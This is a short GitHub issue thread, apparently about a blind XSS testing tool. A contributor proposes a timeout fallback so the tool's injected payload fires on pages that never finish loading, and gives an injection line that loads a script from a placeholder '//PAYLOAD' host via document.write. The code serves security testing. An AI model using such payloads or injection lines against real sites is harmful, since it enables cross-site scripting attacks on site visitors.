Default payload edge-case
Geluchat opened this issue · 5 comments
Hello,
I've observed that some websites never attain a document.readyState of "complete". This causes issues with the default payload:
ez_rD={},"complete"==document.readyState?ez_hL():ez_aE(window,"load",function(){ez_hL()});To address this, I've created the following patch:
ez_rD = {};
document.readyState === "complete" ? ez_hL() : (() => {
let timeoutId = setTimeout(ez_hL, 2000);
ez_aE(window, "load", () => {
clearTimeout(timeoutId);
ez_hL();
});
})();This revised script adds a fallback mechanism, triggering ez_hL() after a short delay even if the page hasn't fully loaded. This could be useful for handling edge cases, especially in blind XSS payloads where the execution context is unpredictable.
Hope this assists others!
Best regards,
Hey @Geluchat,
Thanks for this. Do you maybe have an example of a website where this is not triggered?
Do you mean that some sites never trigger it, or do you mean that the page might be closed before being completely loaded? Or is there some kind or error involved that the page is not 'loaded'?
Hope to hear from you.
Because it might be even better to change "complete" to "loading" or "interactive". But it needs some debugging.
Hello,
To illustrate, when a website utilizes document.write(XSS), the document remains in a loaded state. The MDN documentation provides insight into this concern. You can refer to the relevant section here: MDN's Document.write. To quote: "document.write() writes to the document stream, and invoking document.write() on an already loaded document implicitly triggers document.open(), resulting in the clearing of the document."
Below is a code snippet that demonstrates the issue:
document.write('<script src="//PAYLOAD"></script>')Best regards,
Thanks! I will look into this, do some debugging and will fix accordantly.